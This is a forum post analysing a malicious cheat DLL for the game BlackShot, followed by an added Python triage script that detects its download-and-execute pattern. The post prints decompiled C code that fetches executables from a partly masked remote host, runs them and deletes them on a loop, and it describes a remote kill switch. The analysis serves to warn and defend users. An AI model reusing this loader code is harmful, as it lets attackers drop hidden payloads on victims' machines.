  1. #1 biexor

    BlackHook Virus Analysis

    Here is a full analysis of Bl@ck H0ok.

    For those of you that do not understand it, just skip down to the conclusion.

    BlackHook is a hack for BlackShot that many of you have tried or are using.
    However, what most of you don't know is that this is not just a hack, it's also a virus downloader!

    Since this is a self-made virus, no "normal" virus scanner will be able to report this as a virus.

    TIP: You should always run suspicious files inside a Sandbox!



    Analysis:

    This is what BlackHook does when it is injected into a process:

    [PHP]#include <windows.h>
    #include <stdio.h>   // remove()

    // Thread entry points found in the DLL; only RunVirus is shown in full below.
    DWORD WINAPI D3D9Hook(LPVOID);
    DWORD WINAPI Hook(LPVOID);
    DWORD WINAPI AskPermission(LPVOID);
    DWORD WINAPI RunVirus(LPVOID);

    BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        if ( fdwReason == DLL_PROCESS_ATTACH )   // == 1: the DLL was just injected into the game
        {
            // The two hooks are the advertised "hack"; the other two threads are the payload.
            CreateThread(0, 0, D3D9Hook, 0, 0, 0);
            CreateThread(0, 0, Hook, 0, 0, 0);
            CreateThread(0, 0, AskPermission, 0, 0, 0);   // remote on/off switch
            CreateThread(0, 0, RunVirus, 0, 0, 0);        // download-and-execute
        }
        else if ( fdwReason == DLL_PROCESS_DETACH )   // == 0: on unload, wipe the dropped files
        {
            remove("bypass.exe");
            remove("bypass_.exe");
            remove("bypass__.exe");
        }
        return TRUE;
    }[/PHP]


    First, let's take a look at
    [PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AskPermission, 0, 0, 0);[/PHP]


    The code inside this thread downloads this file: "https://www.dope****/stlr/public.dat"
    and saves it as "crasherror.dat".
    "crasherror.dat" is just a fake file name to make it look convincing.


    What's so special about this file?

    This file contains a simple boolean, which tells BlackHook to enable or disable itself.
    This means that Cocaine1 (the creator of the BlackHook Virus) can make BlackHook unusable to everyone
    just by changing this text file.
    So if Cocaine1 does not want you to run BlackHook, he can just delete the file from his server
    .. and now BlackHook will not work anymore.



    Now, let's see what RunVirus does
    [PHP]CreateThread(0, 0, (LPTHREAD_START_ROUTINE)RunVirus, 0, 0, 0);[/PHP]


    This is what happens inside RunVirus:

    [PHP]#include <windows.h>
    #include <urlmon.h>   // URLDownloadToFileA (link with urlmon.lib)
    #include <stdio.h>    // remove()

    DWORD WINAPI RunVirus(LPVOID unused)
    {
        // Wipe leftovers from an earlier run, then fetch the three payloads.
        // They are served as ".dat" so the names look harmless on the server.
        remove("bypass.exe");
        remove("bypass_.exe");
        remove("bypass__.exe");
        URLDownloadToFileA(0, "https://www.dope****/stlr/bypass.dat", "bypass.exe", 0, 0);
        Sleep(5000);
        URLDownloadToFileA(0, "https://www.dope****/bypass_.dat", "bypass_.exe", 0, 0);
        Sleep(5000);
        URLDownloadToFileA(0, "https://www.dope****/bypass__.dat", "bypass__.exe", 0, 0);
        Sleep(5000);
        // Launch each payload from the game's working directory.
        ShellExecuteA(0, "open", "bypass.exe", 0, 0, 0);
        Sleep(1000);
        ShellExecuteA(0, "open", "bypass_.exe", 0, 0, 0);
        Sleep(1000);
        ShellExecuteA(0, "open", "bypass__", 0, 0, 0);   // bug in the original: ".exe" missing, so this one never starts
        // Keep deleting the dropped files every 250 ms so they are hard to spot on disk.
        while ( 1 )
        {
            remove("bypass.exe");
            remove("bypass_.exe");
            remove("bypass__.exe");
            Sleep(250);
        }
    }
    [/PHP]
    This code should be very self-explanatory.

    It downloads three viruses and opens them.

    You can see that there is a BUG in this program ...
    The third virus will not open because the filename is wrong lmao.

    But if you have ever used BlackHook, you are still infected with the two other viruses. Most likely keyloggers.



    Next, I will make a crack for BlackHook which removes the viruses and also enables you to run BlackHook forever. Stay tuned.

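An added example, not part of biexor's post and not code from BlackHook: a small static triage script that looks for the download-and-execute pattern the analysis above exposes (a download import such as URLDownloadToFileA, a launch import such as ShellExecuteA, hard-coded URLs, and local .exe drop names). It works on raw bytes rather than a parsed PE, so it runs just as well on a carved memory region as on the DLL itself, and it checks a wider set of download/launch APIs than the two BlackHook uses. The sample blob is constructed for the example and the host loader.example.org is hypothetical.

```python
"""
Static string triage for a download-and-execute loader like the one analysed
above. It scans a raw byte blob (a dropped DLL, a carved memory region) for the
indicators the analysis exposes: a download import, a process-launch import,
hard-coded HTTP(S) URLs, and local .exe drop names.

Added example; not code from the original post or from BlackHook. The sample
blob at the bottom is constructed and its host (loader.example.org) is hypothetical.
"""
import re
from dataclasses import dataclass

# Imports a loader needs to fetch a file over HTTP(S) ...
DOWNLOAD_APIS = frozenset({
    b"URLDownloadToFileA", b"URLDownloadToFileW",
    b"InternetOpenUrlA", b"InternetOpenUrlW", b"WinHttpOpenRequest",
})
# ... and to run what it fetched.
EXEC_APIS = frozenset({
    b"ShellExecuteA", b"ShellExecuteW", b"ShellExecuteExA", b"ShellExecuteExW",
    b"CreateProcessA", b"CreateProcessW", b"WinExec",
})
# Remote names that do not look executable; the loader renames them on disk.
DATA_EXTENSIONS = (b".dat", b".txt", b".jpg", b".png", b".gif")

URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")
EXE_RE = re.compile(rb"(?<![A-Za-z0-9_.])[A-Za-z0-9_.-]+\.exe\b")
TOKEN_RE = re.compile(rb"[A-Za-z0-9_]{4,}")


@dataclass(frozen=True)
class Triage:
    download_apis: frozenset
    exec_apis: frozenset
    urls: tuple          # hard-coded URLs, sorted
    drop_names: tuple    # local .exe names outside any URL, sorted

    @property
    def is_downloader(self) -> bool:
        """Download import + launch import + at least one hard-coded URL."""
        return bool(self.download_apis and self.exec_apis and self.urls)

    @property
    def data_named_fetches(self) -> tuple:
        """URLs served under a data-file name (bypass.dat -> bypass.exe)."""
        return tuple(u for u in self.urls if u.lower().endswith(DATA_EXTENSIONS))


def triage(blob: bytes) -> Triage:
    tokens = frozenset(TOKEN_RE.findall(blob))
    urls = tuple(sorted(set(URL_RE.findall(blob))))
    # Blank out URL spans first so remote file names are not counted as drops.
    local_only = URL_RE.sub(b" ", blob)
    drops = tuple(sorted(set(EXE_RE.findall(local_only))))
    return Triage(
        download_apis=tokens & DOWNLOAD_APIS,
        exec_apis=tokens & EXEC_APIS,
        urls=urls,
        drop_names=drops,
    )


def report(t: Triage) -> str:
    verdict = "DOWNLOADER" if t.is_downloader else "no download-and-execute pattern"
    lines = [f"verdict: {verdict}"]
    lines += [f"download api: {a.decode()}" for a in sorted(t.download_apis)]
    lines += [f"exec api:     {a.decode()}" for a in sorted(t.exec_apis)]
    lines += [f"url:          {u.decode()}" for u in t.urls]
    lines += [f"drops:        {n.decode()}" for n in t.drop_names]
    return "\n".join(lines)


# Constructed stand-in for the string/import area of a loader like BlackHook.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"KERNEL32.dll\x00CreateThread\x00Sleep\x00"
    + b"urlmon.dll\x00URLDownloadToFileA\x00"
    + b"SHELL32.dll\x00ShellExecuteA\x00"
    + b"https://loader.example.org/stlr/public.dat\x00crasherror.dat\x00"
    + b"https://loader.example.org/stlr/bypass.dat\x00bypass.exe\x00"
    + b"https://loader.example.org/bypass_.dat\x00bypass_.exe\x00"
    + b"https://loader.example.org/bypass__.dat\x00bypass__.exe\x00"
    + b"open\x00bypass__\x00d3d9.dll\x00"
)

if __name__ == "__main__":
    print(report(triage(SAMPLE_BLOB)))
```

The verdict is deliberately a combination, not any single string: plenty of legitimate updaters import URLDownloadToFileA and CreateProcess, so the URL and drop lists are printed for a human to eyeball. A loader that builds its URLs at runtime or resolves imports by hash will slip past this string-level check, which is exactly why the post's advice to run unknown files in a sandbox still stands.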
